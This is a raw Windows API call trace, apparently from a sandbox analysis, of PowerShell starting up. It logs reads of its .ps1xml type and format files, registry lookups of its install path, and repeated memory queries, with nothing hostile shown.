	[0374.340] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.340] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1000, lpOverlapped=0x0) returned 1
	[0374.340] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x1b4, lpOverlapped=0x0) returned 1
	[0374.340] ReadFile (in: hFile=0x32c, lpBuffer=0x2b512b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d268, lpOverlapped=0x0 | out: lpBuffer=0x2b512b8*, lpNumberOfBytesRead=0x14d268*=0x0, lpOverlapped=0x0) returned 1
	[0374.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0374.341] SetErrorMode (uMode=0x1) returned 0x1
	[0374.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d1e0 | out: lpFileInformation=0x14d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0374.341] SetErrorMode (uMode=0x1) returned 0x1
	[0374.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0374.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2c8 | out: phkResult=0x14d2c8*=0x32c) returned 0x0
	[0374.342] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d24c, lpData=0x0, lpcbData=0x14d248*=0x0 | out: lpType=0x14d24c*=0x1, lpData=0x0, lpcbData=0x14d248*=0x56) returned 0x0
	[0374.342] CoTaskMemAlloc (cb=0x5a) returned 0x1b702cb0
	[0374.342] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d21c, lpData=0x1b702cb0, lpcbData=0x14d218*=0x56 | out: lpType=0x14d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d218*=0x56) returned 0x0
	[0374.342] CoTaskMemFree (pv=0x1b702cb0) 
	[0374.342] RegCloseKey (hKey=0x32c) returned 0x0
	[0374.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0374.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0375.189] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.196] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.199] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.199] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.199] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.199] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.200] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.201] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.209] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.210] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.210] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.210] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.210] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.210] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.211] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.211] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.733] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.740] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.740] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.740] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.740] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.741] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.741] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.741] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.741] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.742] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.742] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.742] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.743] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.743] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.744] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.746] VirtualQuery (in: lpAddress=0x14bfc0, lpBuffer=0x14ce80, dwLength=0x30 | out: lpBuffer=0x14ce80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.746] VirtualQuery (in: lpAddress=0x14bfc0, lpBuffer=0x14ce80, dwLength=0x30 | out: lpBuffer=0x14ce80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.747] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0375.759] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.345] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.345] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.345] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.350] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0376.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.350] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0376.352] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.358] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.358] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.361] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.361] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.364] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.364] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.365] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.366] VirtualQuery (in: lpAddress=0x14bfb0, lpBuffer=0x14ce70, dwLength=0x30 | out: lpBuffer=0x14ce70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0376.367] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d468 | out: phkResult=0x14d468*=0x32c) returned 0x0
	[0376.367] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d47c, lpData=0x0, lpcbData=0x14d478*=0x0 | out: lpType=0x14d47c*=0x1, lpData=0x0, lpcbData=0x14d478*=0x74) returned 0x0
	[0376.367] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d3ec, lpData=0x0, lpcbData=0x14d3e8*=0x0 | out: lpType=0x14d3ec*=0x1, lpData=0x0, lpcbData=0x14d3e8*=0x74) returned 0x0
	[0376.367] CoTaskMemAlloc (cb=0x78) returned 0x3c4320
	[0376.367] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d3bc, lpData=0x3c4320, lpcbData=0x14d3b8*=0x74 | out: lpType=0x14d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d3b8*=0x74) returned 0x0
	[0376.367] CoTaskMemFree (pv=0x3c4320) 
	[0376.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0376.368] SetErrorMode (uMode=0x1) returned 0x1
	[0376.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0376.368] SetErrorMode (uMode=0x1) returned 0x1
	[0376.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.369] SetErrorMode (uMode=0x1) returned 0x1
	[0376.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0376.369] SetErrorMode (uMode=0x1) returned 0x1
	[0376.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0376.370] SetErrorMode (uMode=0x1) returned 0x1
	[0376.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0376.370] SetErrorMode (uMode=0x1) returned 0x1
	[0376.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.370] SetErrorMode (uMode=0x1) returned 0x1
	[0376.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0376.370] SetErrorMode (uMode=0x1) returned 0x1
	[0376.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0376.371] SetErrorMode (uMode=0x1) returned 0x1
	[0376.371] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0376.371] SetErrorMode (uMode=0x1) returned 0x1
	[0376.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0376.853] SetErrorMode (uMode=0x1) returned 0x1
	[0376.853] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0376.853] SetErrorMode (uMode=0x1) returned 0x1
	[0376.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0376.853] SetErrorMode (uMode=0x1) returned 0x1
